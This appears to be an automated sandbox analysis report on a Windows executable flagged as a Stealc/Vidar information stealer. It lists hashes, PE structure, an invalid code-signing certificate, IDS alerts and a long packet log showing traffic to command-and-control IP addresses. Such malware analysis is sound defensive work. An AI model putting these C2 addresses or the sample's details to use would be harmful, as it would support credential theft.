                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                  File name:file.exe
                                                                                                                                                                  File size:418'480 bytes
                                                                                                                                                                  MD5:37ec6ac7a655216941a30dc46fe1b189
                                                                                                                                                                  SHA1:cf6637aabee2fd26a76e30db0a289201305372fb
                                                                                                                                                                  SHA256:677862ec62130345467fc6472bfbeff124fd2716897db3f8549c29f016ef13cd
                                                                                                                                                                  SHA512:ec33b2631e538d29bf35612e247ec61baf56c5202df6728b4e10b03ae6c9438ceafc698474b289b102ff3a6607d6399af24ed7daee4debd38062d48c22ac4edc
                                                                                                                                                                  SSDEEP:12288:nLYJvfeQmGFFxAKKWKuQLTRURHjZl3EBoYruJ3StafO:L5I5KW5pPW/n
                                                                                                                                                                  TLSH:6B94CE9D725036DFC813D8729EE81DA8FA6034BB931B4113A02355ADEE4DA97CF940F6
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................X............... ....@.. ....................................@................................
                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                  Entrypoint:0x46800a
                                                                                                                                                                  Entrypoint Section:
                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x66FDF27F [Thu Oct 3 01:25:19 2024 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                  Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                  • 22/03/2021 01:00:00 22/03/2024 00:59:59
                                                                                                                                                                  Subject Chain
                                                                                                                                                                  • CN=Gary Kramlich, O=Gary Kramlich, STREET=2653 N 54TH ST, L=MILWAUKEE, S=Wisconsin, PostalCode=53210, C=US
                                                                                                                                                                  Version:3
                                                                                                                                                                  Thumbprint MD5:394B591BC2CE78B7CF207BF4082E62F4
                                                                                                                                                                  Thumbprint SHA-1:ADFA744AA074FB5DC57EE6445A3E18D606C7BF96
                                                                                                                                                                  Thumbprint SHA-256:AE7DB8B64E8ABD9D36876F049B9770D90C0868D7FE1A2D37CF327DF69FA2DBFE
                                                                                                                                                                  Serial:00F6AD45188E5566AA317BE23B4B8B2C2F
                                                                                                                                                                  Instruction
                                                                                                                                                                  jmp dword ptr [00468000h]
                                                                                                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x587c0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x728 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x60600 | 0x5cb0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x66000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x68000 | 0x8 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x58000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
n@G>6P | 0x2000 | 0x54df0 | 0x54e00 | bdf10184a4717097861fbd83ec9e12a6 | False | 1.00033367083947 | data | 7.9994507847955285 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text | 0x58000 | 0xa7e8 | 0xa800 | d71122b7a8a9143aeb9b1eaacfe94a8d | False | 0.39074125744047616 | data | 4.738468827255519 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x64000 | 0x728 | 0x800 | 7265a8a1bb76b05d0539b6aa89c4c7eb | False | 0.39404296875 | data | 3.85271303443794 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x66000 | 0xc | 0x200 | 354e5ffc7f8a670c981da5a85608e4ce | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
 | 0x68000 | 0x10 | 0x200 | 530a5ee2413e60387bc5b0572eacef22 | False | 0.044921875 | data | 0.14263576814887827 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x640a0 | 0x49c | data | | | 0.42542372881355933
RT_MANIFEST | 0x6453c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T03:35:53.721399+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49722 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:54.941629+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49723 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:56.366413+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49724 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:57.730654+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49725 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:58.429123+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.6 | 49725 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:58.429229+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 49.12.197.9 | 443 | 192.168.2.6 | 49725 | TCP
2024-10-03T03:35:59.102733+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49726 | 49.12.197.9 | 443 | TCP
2024-10-03T03:35:59.801644+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 49.12.197.9 | 443 | 192.168.2.6 | 49726 | TCP
2024-10-03T03:36:00.559955+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49727 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:01.905602+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49728 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:04.977333+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49729 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:06.117394+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49730 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:07.390575+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49731 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:08.845534+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49732 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:10.824936+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49733 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:12.845715+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49735 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:14.763414+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49736 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:16.183576+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49737 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:17.668662+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49738 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:20.838688+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49739 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:22.146206+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49740 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:23.489607+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49741 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:25.031403+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49743 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:27.088335+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49744 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:28.988557+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49745 | 49.12.197.9 | 443 | TCP
2024-10-03T03:36:30.410110+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49746 | 147.45.44.104 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                  Oct 3, 2024 03:35:58.429056883 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:58.429131985 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:58.429136992 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:58.429194927 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:58.429194927 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:58.429568052 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:58.429586887 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:58.440224886 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:58.440253019 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:58.440355062 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:58.440635920 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:58.440649986 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.102504015 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.102732897 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.103068113 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.103081942 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.105205059 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.105226994 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.801207066 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.801323891 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.801340103 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.801378012 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.801388979 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.801431894 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.811984062 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.812015057 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.911010981 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.911083937 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:59.911175013 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.911423922 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:59.911451101 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:00.559801102 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:00.559954882 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:00.560722113 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:00.560758114 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:00.562813997 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:00.562829018 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:00.562886953 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:00.562905073 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.205590963 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.205663919 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.205773115 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.206063986 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.206077099 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.349162102 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.349266052 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.349338055 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.349378109 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.349395990 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.349427938 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.350162983 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.350198984 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.905518055 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.905601978 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.906061888 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.906070948 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:01.924135923 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:01.924170017 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.340790033 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.340852976 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.340895891 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.340893030 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.340935946 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.340955019 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.340975046 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.340997934 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.370951891 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.371002913 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.371124983 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.371180058 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.371200085 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.371269941 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.437026024 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.437067032 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.437113047 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.437129021 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.437164068 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.437187910 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.470035076 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.470065117 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.470125914 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.470144033 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.470165968 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.470175982 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.507034063 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.507061005 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.507143974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.507168055 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.507478952 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.547555923 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.547621012 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.547672987 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.547697067 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.547710896 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.548084974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.559973955 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.560022116 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.560211897 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.560233116 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.560410023 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.573856115 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.573915958 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.573952913 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.573971987 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.573987007 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.574023008 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.591542959 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.591604948 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.591660023 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.591682911 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.591703892 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.591725111 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.605948925 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.606010914 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.606067896 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.606093884 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.606106997 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.606127977 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.623020887 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.623065948 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.623153925 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.623174906 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.623203039 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.974160910 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.974173069 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974788904 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974833012 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974870920 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.974878073 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.974905968 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.974922895 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.976460934 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.976476908 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.976540089 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.976547003 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.977020025 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.977041006 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.977078915 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.977085114 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.977116108 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.977138996 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.982814074 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.982830048 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.982873917 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.982888937 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:02.982899904 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:02.982923985 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.004678965 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.004703045 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.004749060 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.004766941 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.004791021 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.004807949 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.038678885 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.038697958 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.038748026 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.038773060 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.038785934 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.038873911 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.060126066 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.060143948 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.060204029 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.060230970 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.060269117 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.063805103 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.063821077 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.063885927 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.063905001 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.065596104 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.065871954 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.065886021 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.065937042 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.065948009 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.066349983 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.067902088 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.067917109 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.067972898 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.067990065 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.068003893 CEST49728443192.168.2.649.12.197.9
